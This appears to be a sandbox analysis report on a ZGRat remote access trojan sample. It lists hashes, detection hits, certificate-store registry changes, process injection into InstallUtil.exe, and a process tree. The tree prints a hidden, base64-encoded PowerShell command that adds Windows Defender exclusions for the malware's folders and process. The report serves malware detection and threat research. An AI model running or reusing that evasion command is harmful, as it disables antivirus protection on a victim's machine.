zgrat | 70c0d722f4eb2c9cd96a58ef04285323a897c7c28896654d4b1753e240079ad0

Analysis

max time kernel
117s
max time network
121s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
28-04-2024 01:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

70c0d722f4eb2c9cd96a58ef04285323a897c7c28896654d4b1753e240079ad0.exe
Size

145KB
MD5

d83f04d14b3ef5742e3a5cb0c9089dea
SHA1

5ba0a13d620b4e2352de8cd4b033c3b4b4a85015
SHA256

70c0d722f4eb2c9cd96a58ef04285323a897c7c28896654d4b1753e240079ad0
SHA512

0840f4acaf1b98b5358ad0f0b51696cf8298f2f7112401ae79a39de3b02d801403914bc21f1704b9bc3df390d0886859534d9b02385b360b598f745d18ab304b
SSDEEP

3072:8XZGjXpoGoByXPQs2UTXQ8yb7aFcCiSIvF68XJZ:mZGbpYByPT7lyvIcLSIvF68X

Score

10^/10

zgrat rat

Malware Config

Signatures

Detect ZGRat V1 35 IoCs

resource	yara_rule
behavioral1/memory/1252-69-0x00000000079D0000-0x0000000007C96000-memory.dmp	family_zgrat_v1
behavioral1/memory/1252-70-0x00000000079D0000-0x0000000007C91000-memory.dmp	family_zgrat_v1
behavioral1/memory/1252-72-0x00000000079D0000-0x0000000007C91000-memory.dmp	family_zgrat_v1
behavioral1/memory/1252-75-0x00000000079D0000-0x0000000007C91000-memory.dmp	family_zgrat_v1
behavioral1/memory/1252-73-0x00000000079D0000-0x0000000007C91000-memory.dmp	family_zgrat_v1
behavioral1/memory/1252-77-0x00000000079D0000-0x0000000007C91000-memory.dmp	family_zgrat_v1
behavioral1/memory/1252-79-0x00000000079D0000-0x0000000007C91000-memory.dmp	family_zgrat_v1
behavioral1/memory/1252-81-0x00000000079D0000-0x0000000007C91000-memory.dmp	family_zgrat_v1
behavioral1/memory/1252-83-0x00000000079D0000-0x0000000007C91000-memory.dmp	family_zgrat_v1
behavioral1/memory/1252-85-0x00000000079D0000-0x0000000007C91000-memory.dmp	family_zgrat_v1
behavioral1/memory/1252-87-0x00000000079D0000-0x0000000007C91000-memory.dmp	family_zgrat_v1
behavioral1/memory/1252-93-0x00000000079D0000-0x0000000007C91000-memory.dmp	family_zgrat_v1
behavioral1/memory/1252-99-0x00000000079D0000-0x0000000007C91000-memory.dmp	family_zgrat_v1
behavioral1/memory/1252-101-0x00000000079D0000-0x0000000007C91000-memory.dmp	family_zgrat_v1
behavioral1/memory/1252-89-0x00000000079D0000-0x0000000007C91000-memory.dmp	family_zgrat_v1
behavioral1/memory/1252-113-0x00000000079D0000-0x0000000007C91000-memory.dmp	family_zgrat_v1
behavioral1/memory/1252-115-0x00000000079D0000-0x0000000007C91000-memory.dmp	family_zgrat_v1
behavioral1/memory/1252-117-0x00000000079D0000-0x0000000007C91000-memory.dmp	family_zgrat_v1
behavioral1/memory/1252-119-0x00000000079D0000-0x0000000007C91000-memory.dmp	family_zgrat_v1
behavioral1/memory/1252-125-0x00000000079D0000-0x0000000007C91000-memory.dmp	family_zgrat_v1
behavioral1/memory/1252-91-0x00000000079D0000-0x0000000007C91000-memory.dmp	family_zgrat_v1
behavioral1/memory/1252-95-0x00000000079D0000-0x0000000007C91000-memory.dmp	family_zgrat_v1
behavioral1/memory/1252-97-0x00000000079D0000-0x0000000007C91000-memory.dmp	family_zgrat_v1
behavioral1/memory/1252-105-0x00000000079D0000-0x0000000007C91000-memory.dmp	family_zgrat_v1
behavioral1/memory/1252-103-0x00000000079D0000-0x0000000007C91000-memory.dmp	family_zgrat_v1
behavioral1/memory/1252-107-0x00000000079D0000-0x0000000007C91000-memory.dmp	family_zgrat_v1
behavioral1/memory/1252-111-0x00000000079D0000-0x0000000007C91000-memory.dmp	family_zgrat_v1
behavioral1/memory/1252-109-0x00000000079D0000-0x0000000007C91000-memory.dmp	family_zgrat_v1
behavioral1/memory/1252-133-0x00000000079D0000-0x0000000007C91000-memory.dmp	family_zgrat_v1
behavioral1/memory/1252-131-0x00000000079D0000-0x0000000007C91000-memory.dmp	family_zgrat_v1
behavioral1/memory/1252-129-0x00000000079D0000-0x0000000007C91000-memory.dmp	family_zgrat_v1
behavioral1/memory/1252-127-0x00000000079D0000-0x0000000007C91000-memory.dmp	family_zgrat_v1
behavioral1/memory/1252-123-0x00000000079D0000-0x0000000007C91000-memory.dmp	family_zgrat_v1
behavioral1/memory/1252-121-0x00000000079D0000-0x0000000007C91000-memory.dmp	family_zgrat_v1
behavioral1/memory/1252-4962-0x0000000006300000-0x00000000063E8000-memory.dmp	family_zgrat_v1

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Executes dropped EXE 1 IoCs

pid	Process
7900	AuditFlags.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 7900 set thread context of 1032	7900	AuditFlags.exe	37

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	70c0d722f4eb2c9cd96a58ef04285323a897c7c28896654d4b1753e240079ad0.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	70c0d722f4eb2c9cd96a58ef04285323a897c7c28896654d4b1753e240079ad0.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	70c0d722f4eb2c9cd96a58ef04285323a897c7c28896654d4b1753e240079ad0.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	70c0d722f4eb2c9cd96a58ef04285323a897c7c28896654d4b1753e240079ad0.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	70c0d722f4eb2c9cd96a58ef04285323a897c7c28896654d4b1753e240079ad0.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	70c0d722f4eb2c9cd96a58ef04285323a897c7c28896654d4b1753e240079ad0.exe

Suspicious behavior: EnumeratesProcesses 61 IoCs

pid	Process
7696	powershell.exe
7900	AuditFlags.exe
7900	AuditFlags.exe
7056	powershell.exe
7056	powershell.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe
1032	InstallUtil.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

description	pid	Process
Token: SeDebugPrivilege	1252	70c0d722f4eb2c9cd96a58ef04285323a897c7c28896654d4b1753e240079ad0.exe
Token: SeDebugPrivilege	1252	70c0d722f4eb2c9cd96a58ef04285323a897c7c28896654d4b1753e240079ad0.exe
Token: SeDebugPrivilege	1252	70c0d722f4eb2c9cd96a58ef04285323a897c7c28896654d4b1753e240079ad0.exe
Token: SeDebugPrivilege	7696	powershell.exe
Token: SeDebugPrivilege	7900	AuditFlags.exe
Token: SeDebugPrivilege	7900	AuditFlags.exe
Token: SeDebugPrivilege	7900	AuditFlags.exe
Token: SeDebugPrivilege	1032	InstallUtil.exe
Token: SeDebugPrivilege	1032	InstallUtil.exe
Token: SeDebugPrivilege	1032	InstallUtil.exe
Token: SeDebugPrivilege	7056	powershell.exe

Suspicious use of WriteProcessMemory 22 IoCs

description	pid	Process	procid_target
PID 7664 wrote to memory of 7696	7664	taskeng.exe	33
PID 7664 wrote to memory of 7696	7664	taskeng.exe	33
PID 7664 wrote to memory of 7696	7664	taskeng.exe	33
PID 7868 wrote to memory of 7900	7868	taskeng.exe	36
PID 7868 wrote to memory of 7900	7868	taskeng.exe	36
PID 7868 wrote to memory of 7900	7868	taskeng.exe	36
PID 7868 wrote to memory of 7900	7868	taskeng.exe	36
PID 7900 wrote to memory of 1032	7900	AuditFlags.exe	37
PID 7900 wrote to memory of 1032	7900	AuditFlags.exe	37
PID 7900 wrote to memory of 1032	7900	AuditFlags.exe	37
PID 7900 wrote to memory of 1032	7900	AuditFlags.exe	37
PID 7900 wrote to memory of 1032	7900	AuditFlags.exe	37
PID 7900 wrote to memory of 1032	7900	AuditFlags.exe	37
PID 7900 wrote to memory of 1032	7900	AuditFlags.exe	37
PID 7900 wrote to memory of 1032	7900	AuditFlags.exe	37
PID 7900 wrote to memory of 1032	7900	AuditFlags.exe	37
PID 7900 wrote to memory of 1032	7900	AuditFlags.exe	37
PID 7900 wrote to memory of 1032	7900	AuditFlags.exe	37
PID 7900 wrote to memory of 1032	7900	AuditFlags.exe	37
PID 7664 wrote to memory of 7056	7664	taskeng.exe	38
PID 7664 wrote to memory of 7056	7664	taskeng.exe	38
PID 7664 wrote to memory of 7056	7664	taskeng.exe	38

C:\Users\Admin\AppData\Local\Temp\70c0d722f4eb2c9cd96a58ef04285323a897c7c28896654d4b1753e240079ad0.exe
"C:\Users\Admin\AppData\Local\Temp\70c0d722f4eb2c9cd96a58ef04285323a897c7c28896654d4b1753e240079ad0.exe"
1⤵
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1252

C:\Windows\system32\taskeng.exe
taskeng.exe {1292622B-BC80-4F28-AF1D-73BE1D2DE102} S-1-5-21-330940541-141609230-1670313778-1000:KXIPPCKF\Admin:S4U:
1⤵
- Suspicious use of WriteProcessMemory
PID:7664
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQQB1AGQAaQB0AEYAbABhAGcAcwAuAGUAeABlADsA
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:7696
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQQB1AGQAaQB0AEYAbABhAGcAcwAuAGUAeABlADsA
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:7056

C:\Windows\system32\taskeng.exe
taskeng.exe {BDE20C3C-F621-426F-8F37-F3E99139EAE3} S-1-5-21-330940541-141609230-1670313778-1000:KXIPPCKF\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:7868
- C:\Users\Admin\AppData\Local\ActivityId\ckvih\AuditFlags.exe
  C:\Users\Admin\AppData\Local\ActivityId\ckvih\AuditFlags.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:7900
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1032

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
7d565b15d3067cd3290ce2fddfc9147b

SHA1
e0db5281b44fd9e04bf8fc1db0829eec4b21eb2c

SHA256
23c96a3459db22da6ab0c65b7805eaff8bc39a0fad98b366157ee506d0341bbf

SHA512
a22db46f75f3c46c1b47a9c8b24f4b6a1b68aabb3737aae9bcffc9efc2e7b20d97bbfd4cc4f58cb1a157b08a8cb68eed8fbafd05137159e1806d3b24eac1907d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
d42922a4d5383af24cec3cb16ddce2f8

SHA1
1c49e4a4b01d2485fab92ea6e85bb14bbd4b3934

SHA256
0f0c1fffe2ea6cfb07e2043ea9ea1ee7f12f6d720a12d9426c029c243f737fb4

SHA512
ee78b8acbc03dbeca7981efecbb95c4b270a10c5e1650237cf48f798def672c59c770a69970e156d363382e5983337a151c7b134719405b17953f79e3ebaa8ce

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
ca9bf1e39fc4bc2f02e96c307f5a5894

SHA1
9f62a2612af068fe522e6dff4c36cb86c94dd404

SHA256
4f1f14b5142f2eb62d053673b78e24273dc807caf74cf4b49b3440bde8f52dda

SHA512
13c3c1a79be85ac82d13d73b44301f34b39ccec982a1ac844434be2429a01c7c7523bb406f7bfdcd15869674fc9fd358a0a60d5ddf57c29d7b7f3d740c867591

Download Submit
C:\Users\Admin\AppData\Local\ActivityId\ckvih\AuditFlags.exe

Filesize
145KB

MD5
d83f04d14b3ef5742e3a5cb0c9089dea

SHA1
5ba0a13d620b4e2352de8cd4b033c3b4b4a85015

SHA256
70c0d722f4eb2c9cd96a58ef04285323a897c7c28896654d4b1753e240079ad0

SHA512
0840f4acaf1b98b5358ad0f0b51696cf8298f2f7112401ae79a39de3b02d801403914bc21f1704b9bc3df390d0886859534d9b02385b360b598f745d18ab304b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab8567.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar8723.tmp

Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
154e825aae4c8c235add8786292d988e

SHA1
a87c7872ecd2277d529f54e21873b64448cf149e

SHA256
c0c098c399420f7fd33f2c59ab9bb2d17f57e202aa164b613cf5294e262af2bd

SHA512
d1f5d1521284dc542d2792909f1f170fe257ae67bb578081e9394c39bf309c376ad970d5b900399efd32b30298290d769b142ee87e9d3de5fe3053d69dc846a5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DWO16PSEBR2SLQW326XT.temp

Filesize
